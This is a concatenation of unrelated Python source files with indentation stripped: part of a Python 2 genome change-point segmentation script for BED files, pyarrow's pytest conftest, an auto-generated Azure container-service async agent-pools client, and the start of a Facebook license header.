tot_mean = float(data[ub] - data[lb])/n
def wmn(i, offset):
return float(data[lb+i+offset] - data[lb+i])/offset
# part 1 of equation 4.8
offset = int(t*bl/n)
sti, ei = ( 0, int(t-t*bl/n) )
p1 = (t/n**2)*sum( [(wmn(i, offset) - s1_mean)**2 for i in xrange(sti, ei)] )
# part 2 of equation 4.8
sti, ei = ( int(t+1), int(n-(n-t)*bl/n) )
offset = int((n-t)*bl/n)
p2 = ((n-t)/n**2)*sum( [(wmn(i, offset) - s2_mean)**2 for i in xrange(sti, ei)] )
return p1+p2
def find_best_window_score(data, lb, ub):
if cached_scores.has_key((lb, ub)):
return cached_scores[(lb, ub)]
else:
# the best MLE score ( in splitWindow )
currBestScore = 0
# the best split index ( in splitWindow )
currBestIndex = None
# loop through each possible index and calculate the scores
# note that we're calling the iter_split_points method:
# this is an optimization for binary features - it only looks
# at the potential split points
for index in data.iter_split_points(lb+minLength, ub-minLength):
# calculate the score of using this change point
score = change_point_mle(data, lb, ub, index, minLength)
# eliminate the occasional rounding error
if score < M_TOL: score = 0
# if this is the current best score, store a record of it
if score > currBestScore:
currBestScore = score
currBestIndex = index
cached_scores[(lb, ub)] = ( currBestScore, currBestIndex )
return ( currBestScore, currBestIndex )
def find_split(data, splitIndexes):
bestWindow = None
bestIndex = None
bestScore = 0
for splitWindowIndex in xrange(len(splitIndexes) - 1):
# define the window that we will be looking for a split in
splitWindow = (splitIndexes[splitWindowIndex], splitIndexes[splitWindowIndex+1])
# if the window isnt at least 2L, it will be impossible to find a split of length L
if ( splitWindow[1] - splitWindow[0] ) < 2*minLength: continue
# find the best score and it's index
score, index = find_best_window_score(data, splitWindow[0], splitWindow[1])
# if there is no possible split, continue
if index == None:
continue
if b > 0:
# calculate J
V = bbs_var_estimate(data, splitWindow[0], splitWindow[1], index, minLength)
B = score
reg_len = float(splitWindow[1] - splitWindow[0])
lam = minLength*reg_len/( splitIndexes[-1] - splitIndexes[0] )
J = int( (reg_len*B)/(V*lam) > b )
if verbose:
print >> output, "b: ", (reg_len*B)/(V*lam), " > ", b, "\tM: ", score, "\tBest Index: ", index
# if the best score for this window is the best so far for all the windows
# then make a record of that
if score > bestScore and ( b == 0 or J > 0 ) :
bestIndex = index
bestScore = score
bestWindow = splitWindowIndex
if bestIndex != None:
# XXX THE VARIANCE CODE IS BROKEN!!!
#best_V_score = bbs_var_estimate(data, splitIndexes[bestWindow], splitIndexes[bestWindow+1], bestIndex, minLength)
best_V_score = 0
return {'Best Window': bestWindow, 'Best Index': bestIndex, 'M': bestScore, 'V': best_V_score}
# otherwise, return None
else:
return None
### Actually do stuff ##############################################################################################
splitIndexes = [0,len(data)-1]
if maxIterations == None:
maxIterations = int( ( 2.0*len(data) )/minLength )
for loop in xrange(maxIterations):
split_data = find_split( data, splitIndexes )
if verbose: print >> output, loop, splitIndexes, "\n", split_data
if split_data == None: break
splitIndexes.insert(split_data['Best Window']+1, split_data['Best Index'])
return splitIndexes
def merge_boundaries(boundaries, regions_list, min_boundary_len):
"""This merges boundaries.
"""
base_region = regions_list[0]
# a method to flatten the boundaries list
def flatten(lst):
for elem in lst:
if type(elem) in (tuple, list):
for i in flatten(elem):
yield i
else:
yield elem
# make the boundaries list unique
boundaries = list(set(flatten(boundaries)))
# sort the boundaries list
boundaries.sort()
# test for regions that are too small
loop = 0
while loop < len(boundaries)-1:
if verbose:
print "Curr Boundaries: ", boundaries
rs = boundaries[loop]
re = boundaries[loop+1]
if re - rs + 1 < min_boundary_len:
# if rs == 0, then we MUST put this in with the next bucket
if rs == 0:
boundaries.remove(re)
# if re == length, then we MUST put this in with the next bucket
elif re == boundaries[-1]:
boundaries.remove(rs)
else:
# try and put this bucket with the bucket with the closest mean
# with respect to base_region
prev_reg = base_region[boundaries[loop-1]:boundaries[loop]]
mean1 = prev_reg.featuresLength()/float( boundaries[loop] - boundaries[loop-1] + 1 )
next_reg = base_region[boundaries[loop]:boundaries[loop+1]]
mean2 = next_reg.featuresLength()/float( boundaries[loop+1] - boundaries[loop] + 1 )
current_mean = base_region[rs:re].featuresLength()/float( re - rs + 1 )
if verbose:
print "Lower Mean: %.5f Current Mean: %.5f Upper Mean: %.5f" % (mean1, current_mean, mean2)
if abs(current_mean - mean1) < abs(current_mean - mean2):
boundaries.remove(rs)
else:
boundaries.remove(re)
# retart the loop
loop = 0
else:
#increment the loop
loop += 1
return boundaries
def usage():
print >> output, """
Split a bed file into more regions and writes the result into a new bed file.
INPUTS:
-i --input: The regions to split, in a .bed file.
alternatively, to split two bed files by their combined split points
-1 --input1: region1 to split, in a .bed file.
-2 --input2: region2 to split, in a .bed file.
-d --domain : the domain of the data files, the portion of the genome over
which these features (-1 and -2) are defined. The support of the
statistics. Usually determined by array coverage or "alignibility". If the
features are defined everywhere (e.g. such as may be the case in C. elegans
data), then this file contains one line for each chromosome, with:
"chr_name 0 chr_length" on each line.
-m --min_length: For the "double bootstrap" in any organism this should be at
least 5,000,000. For human or mouse, it should be at least 1,000,000 in
general, for Drosophila at least 500,000, and for C. elegans, at least
250,000. Larger values will cause down stream analysis to be more
conservative, so initial runs should use quite large values. If
significance is obtained with larger values, it will certainly hold for
smaller ones.
-s --max_splits: The maximum number of times to split a region. Defaults to
no maximum. Recommended: no maximum.
-p --plot: Plot the CDF of the region data and overlay the calculated split
points. This option requires that the pylab module is part of your python
distribution ( usually part of matplotlib ) and that you are running this
locally.
-g --generate_test_data: Generates a region of test data and writes it to
sim_output.bed and sim_lengths.txt. The region will be approximately 500k
BP's long and consist of intervals with normally distributed lengths of
mean 1k BP's and SD's of 200 BP's. The region will consist of 5 ( unnamed )
subregions of length 100k and with means (0.1, 0.3, 0.5, 0.7, 0.9). For
finer control over the generation procedure, load this as a module and
call the function generateSequences directly.
-o --output_file_prefix: A file prefix to name the output files. For instance,
if the input file names are test.bed and test.txt, and the prefix is split_
the files will be written to split_test.bed and split_lengths.bed. The
prefix defaults to split_. THIS WILL SILENTLY OVERWRITE ANY EXISTING FILES
OF THE SAME NAME !
"""
def main():
try:
long_args = ["input=", "input1=", "input2=", "domain=", "min_length=", "max_splits=", "output_file_prefix=", "verbose", "plot", "generate_test_data", "help"]
opts, args = getopt.getopt(sys.argv[1:], "i:1:2:d:m:s:o:vpgh", long_args)
except getopt.GetoptError, err:
print str(err)
usage()
sys.exit(2)
# set the default options
max_splits = None
output_fname_prefix = "split_"
do_plot = False
for o, a in opts:
if o in ("-v", "--verbose"):
global verbose
verbose = True
elif o in ("-h", "--help"):
usage()
sys.exit()
elif o in ("-i", "--input"):
split_file = open(a)
elif o in ("-1", "--input1"):
split_file1 = open(a)
elif o in ("-2", "--input2"):
split_file2 = open(a)
elif o in ("-d", "--domain"):
lengths_file = open(a)
elif o in ("-m", "--min_length"):
min_length = int(a)
elif o in ("-s", "--max_splits"):
max_splits = int(a)
elif o in ("-p", "--plot"):
try:
global pylab
import pylab
except ImportError:
raise ImportError, "Must have pylab installed to use plot option."
else:
do_plot = True
elif o in ("-g", "--generate_test_data"):
print "Saving the simulated region as 'sim_output.bed' and 'sim_lengths.txt'..."
generateSequences(number=2)
print"\nfinished.\n"
sys.exit()
elif o in ("-o", "--output_file_prefix"):
output_fname_prefix = a
else:
assert False, "unhandled option %s" % o
try:
assert vars().has_key('split_file') or ( vars().has_key('split_file1') and vars().has_key('split_file2') )
assert vars().has_key('lengths_file')
assert vars().has_key('min_length')
except Exception, inst:
print inst
usage()
sys.exit()
if vars().has_key('split_file'):
split_files = ( split_file, )
else:
split_files = (split_file1, split_file2)
# build the regions list
regions_s_to_split = [parse_bed_file(fp, lengths_file) for fp in split_files ]
if verbose:
print >> output, "Region files parsed."
# close all of the open files
for fp in split_files:
fp.close()
lengths_file.close()
if verbose:
import time
startTime = time.time()
import encode
baseRegions = []
for i in xrange(len(regions_s_to_split)):
test = encode.regions()
baseRegions.append(test)
# for each named region in
for key in regions_s_to_split[0].keys():
# store the region boundaries for each area
region_boundaries = []
# a list of region's for this key
region_list = [ regions[key] for regions in regions_s_to_split ]
# make sure all of the lengths are the same
assert len(set( region.length for region in region_list )) == 1
# for each regions in the regions
# note that we require the regions 'line up'
# the named regions should have identical names and lengths
for data in region_list:
cd = cumulative_data( data )
if verbose:
print >> output, "Cumulative Data object built for %s" % key
region_boundaries.append( segment( cd, min_length, b=0, maxIterations=max_splits) )
if verbose:
print >> output, "\n", region_boundaries
if do_plot:
cumulative_data( data ).plot( region_boundaries[-1] )
print "Press enter to continue..."
raw_input()
# merge the region boundaries
if len(region_list) == 1:
boundaries = region_boundaries[0]
else:
boundaries = merge_boundaries( region_boundaries, region_list, min_length )
if do_plot and len(split_files) > 1:
for data in region_list:
cumulative_data( data ).plot( boundaries )
print "Press enter to continue..."
raw_input()
if verbose:
print boundaries
for data, baseRegion in zip(region_list, baseRegions):
# note that we dont put the beginning and end into the split argument
split_data = data.split(boundaries[1:-1])
baseRegion.extend(split_data)
for fp in split_files:
### FIX ME - i shouldnt be writing and overwriting the lengths file
# write the output to a bed file
of = open(output_fname_prefix + fp.name, 'w')
olf = open(output_fname_prefix + lengths_file.name, 'w')
baseRegion.writeBedFile(of, olf)
of.close()
olf.close()
if verbose: print >> output, "Execution Time: ", time.time()-startTime
if __name__ == "__main__":
main()
| |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import pytest
import hypothesis as h
try:
import pathlib
except ImportError:
import pathlib2 as pathlib # py2 compat
# setup hypothesis profiles
h.settings.register_profile('ci', max_examples=1000)
h.settings.register_profile('dev', max_examples=10)
h.settings.register_profile('debug', max_examples=10,
verbosity=h.Verbosity.verbose)
# load default hypothesis profile, either set HYPOTHESIS_PROFILE environment
# variable or pass --hypothesis-profile option to pytest, to see the generated
# examples try: pytest pyarrow -sv --only-hypothesis --hypothesis-profile=debug
h.settings.load_profile(os.environ.get('HYPOTHESIS_PROFILE', 'dev'))
groups = [
'cython',
'hypothesis',
'fastparquet',
'gandiva',
'hdfs',
'large_memory',
'orc',
'pandas',
'parquet',
'plasma',
's3',
'tensorflow',
'flight'
]
defaults = {
'cython': False,
'fastparquet': False,
'hypothesis': False,
'gandiva': False,
'hdfs': False,
'large_memory': False,
'orc': False,
'pandas': False,
'parquet': False,
'plasma': False,
's3': False,
'tensorflow': False,
'flight': False,
}
try:
import cython # noqa
defaults['cython'] = True
except ImportError:
pass
try:
import fastparquet # noqa
defaults['fastparquet'] = True
except ImportError:
pass
try:
import pyarrow.gandiva # noqa
defaults['gandiva'] = True
except ImportError:
pass
try:
import pyarrow.orc # noqa
defaults['orc'] = True
except ImportError:
pass
try:
import pandas # noqa
defaults['pandas'] = True
except ImportError:
pass
try:
import pyarrow.parquet # noqa
defaults['parquet'] = True
except ImportError:
pass
try:
import pyarrow.plasma as plasma # noqa
defaults['plasma'] = True
except ImportError:
pass
try:
import tensorflow # noqa
defaults['tensorflow'] = True
except ImportError:
pass
try:
import pyarrow.flight # noqa
defaults['flight'] = True
except ImportError:
pass
def pytest_configure(config):
for mark in groups:
config.addinivalue_line(
"markers", mark,
)
def pytest_addoption(parser):
def bool_env(name, default=None):
value = os.environ.get(name.upper())
if value is None:
return default
value = value.lower()
if value in {'1', 'true', 'on', 'yes', 'y'}:
return True
elif value in {'0', 'false', 'off', 'no', 'n'}:
return False
else:
raise ValueError('{}={} is not parsable as boolean'
.format(name.upper(), value))
for group in groups:
for flag, envvar in [('--{}', 'PYARROW_TEST_{}'),
('--enable-{}', 'PYARROW_TEST_ENABLE_{}')]:
default = bool_env(envvar.format(group), defaults[group])
parser.addoption(flag.format(group),
action='store_true', default=default,
help=('Enable the {} test group'.format(group)))
default = bool_env('PYARROW_TEST_DISABLE_{}'.format(group), False)
parser.addoption('--disable-{}'.format(group),
action='store_true', default=default,
help=('Disable the {} test group'.format(group)))
default = bool_env('PYARROW_TEST_ONLY_{}'.format(group), False)
parser.addoption('--only-{}'.format(group),
action='store_true', default=default,
help=('Run only the {} test group'.format(group)))
parser.addoption('--runslow', action='store_true',
default=False, help='run slow tests')
def pytest_collection_modifyitems(config, items):
if not config.getoption('--runslow'):
skip_slow = pytest.mark.skip(reason='need --runslow option to run')
for item in items:
if 'slow' in item.keywords:
item.add_marker(skip_slow)
def pytest_runtest_setup(item):
only_set = False
item_marks = {mark.name: mark for mark in item.iter_markers()}
for group in groups:
flag = '--{0}'.format(group)
only_flag = '--only-{0}'.format(group)
enable_flag = '--enable-{0}'.format(group)
disable_flag = '--disable-{0}'.format(group)
if item.config.getoption(only_flag):
only_set = True
elif group in item_marks:
is_enabled = (item.config.getoption(flag) or
item.config.getoption(enable_flag))
is_disabled = item.config.getoption(disable_flag)
if is_disabled or not is_enabled:
pytest.skip('{0} NOT enabled'.format(flag))
if only_set:
skip_item = True
for group in groups:
only_flag = '--only-{0}'.format(group)
if group in item_marks and item.config.getoption(only_flag):
skip_item = False
if skip_item:
pytest.skip('Only running some groups with only flags')
@pytest.fixture
def tempdir(tmpdir):
# convert pytest's LocalPath to pathlib.Path
return pathlib.Path(tmpdir.strpath)
@pytest.fixture(scope='session')
def datadir():
return pathlib.Path(__file__).parent / 'data'
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._agent_pools_operations import build_create_or_update_request_initial, build_delete_request_initial, build_get_available_agent_pool_versions_request, build_get_request, build_get_upgrade_profile_request, build_list_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class AgentPoolsOperations:
"""AgentPoolsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.containerservice.v2020_01_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace
def list(
self,
resource_group_name: str,
resource_name: str,
**kwargs: Any
) -> AsyncIterable["_models.AgentPoolListResult"]:
"""Gets a list of agent pools in the specified managed cluster.
Gets a list of agent pools in the specified managed cluster. The operation returns properties
of each agent pool.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either AgentPoolListResult or the result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.containerservice.v2020_01_01.models.AgentPoolListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AgentPoolListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
template_url=self.list.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("AgentPoolListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools'} # type: ignore
@distributed_trace_async
async def get(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
**kwargs: Any
) -> "_models.AgentPool":
"""Gets the agent pool.
Gets the details of the agent pool by managed cluster and resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:param agent_pool_name: The name of the agent pool.
:type agent_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AgentPool, or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2020_01_01.models.AgentPool
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AgentPool"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('AgentPool', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
parameters: "_models.AgentPool",
**kwargs: Any
) -> "_models.AgentPool":
cls = kwargs.pop('cls', None) # type: ClsType["_models.AgentPool"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'AgentPool')
request = build_create_or_update_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
content_type=content_type,
json=_json,
template_url=self._create_or_update_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('AgentPool', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('AgentPool', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}'} # type: ignore
@distributed_trace_async
async def begin_create_or_update(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
parameters: "_models.AgentPool",
**kwargs: Any
) -> AsyncLROPoller["_models.AgentPool"]:
"""Creates or updates an agent pool.
Creates or updates an agent pool in the specified managed cluster.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:param agent_pool_name: The name of the agent pool.
:type agent_pool_name: str
:param parameters: Parameters supplied to the Create or Update an agent pool operation.
:type parameters: ~azure.mgmt.containerservice.v2020_01_01.models.AgentPool
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either AgentPool or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerservice.v2020_01_01.models.AgentPool]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.AgentPool"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
parameters=parameters,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('AgentPool', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}'} # type: ignore
async def _delete_initial(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
template_url=self._delete_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}'} # type: ignore
@distributed_trace_async
async def begin_delete(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Deletes an agent pool.
Deletes the agent pool in the specified managed cluster.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:param agent_pool_name: The name of the agent pool.
:type agent_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}'} # type: ignore
@distributed_trace_async
async def get_upgrade_profile(
self,
resource_group_name: str,
resource_name: str,
agent_pool_name: str,
**kwargs: Any
) -> "_models.AgentPoolUpgradeProfile":
"""Gets upgrade profile for an agent pool.
Gets the details of the upgrade profile for an agent pool with a specified resource group and
managed cluster name.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:param agent_pool_name: The name of the agent pool.
:type agent_pool_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AgentPoolUpgradeProfile, or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2020_01_01.models.AgentPoolUpgradeProfile
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AgentPoolUpgradeProfile"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_upgrade_profile_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
agent_pool_name=agent_pool_name,
template_url=self.get_upgrade_profile.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('AgentPoolUpgradeProfile', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_upgrade_profile.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/agentPools/{agentPoolName}/upgradeProfiles/default'} # type: ignore
@distributed_trace_async
async def get_available_agent_pool_versions(
self,
resource_group_name: str,
resource_name: str,
**kwargs: Any
) -> "_models.AgentPoolAvailableVersions":
"""Gets a list of supported versions for the specified agent pool.
Gets a list of supported versions for the specified agent pool.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AgentPoolAvailableVersions, or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2020_01_01.models.AgentPoolAvailableVersions
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AgentPoolAvailableVersions"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_available_agent_pool_versions_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
template_url=self.get_available_agent_pool_versions.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('AgentPoolAvailableVersions', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_available_agent_pool_versions.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/availableAgentPoolVersions'} # type: ignore
| |
# Copyright (c) 2016-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
